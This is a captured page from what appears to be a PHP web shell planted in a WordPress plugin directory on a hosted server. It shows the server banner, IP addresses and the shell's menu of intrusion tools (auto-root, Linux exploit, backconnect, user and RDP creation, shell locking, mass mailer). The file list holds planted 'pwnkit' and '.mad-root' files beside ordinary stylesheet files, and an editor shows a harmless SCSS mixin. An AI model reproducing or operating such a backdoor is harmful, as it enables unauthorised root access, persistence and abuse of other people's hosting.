Linux webm019.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.128.20.19 | : 216.73.216.176
Cant Read [ /etc/named.conf ]
8.0.30
nicedoo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
nicedoo /
www /
wp-content /
plugins /
megamenu /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
compatibility.scss
1.44
KB
-rw-r--r--
megamenu.scss
46.97
KB
-rw-r--r--
mixin.scss
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
reset.scss
1.44
KB
-rw-r--r--
toggle-blocks.scss
6.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mixin.scss
@mixin border-radius($topleft: 0, $topright: 0, $bottomright: 0, $bottomleft: 0) { @if $topleft == 0 and $topright == 0 and $bottomright == 0 and $bottomleft == 0 { border-radius: 0; } @else if $topleft == 0px and $topright == 0px and $bottomright == 0px and $bottomleft == 0px { border-radius: 0; } @else { border-radius: $topleft $topright $bottomright $bottomleft; } } @mixin box-shadow($value) { box-shadow: $value; } @mixin background($from, $to) { @if $to == $from { background: $to; } @else { background: $to; background: linear-gradient(to bottom, $from, $to); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#{ie_hex_str($from)}', endColorstr='#{ie_hex_str($to)}'); } } @mixin border($top, $left, $right, $bottom, $color) { @if $top == 0px and $left == 0px and $right == 0px and $bottom == 0px { border: 0; } @else { border-top: $top solid $color; border-left: $left solid $color; border-right: $right solid $color; border-bottom: $bottom solid $color; } } @mixin mobile { @media only screen and (max-width : $responsive_breakpoint) { @content; } } @mixin desktop { @media only screen and (min-width : $responsive_breakpoint + 1) { @content; } }
Close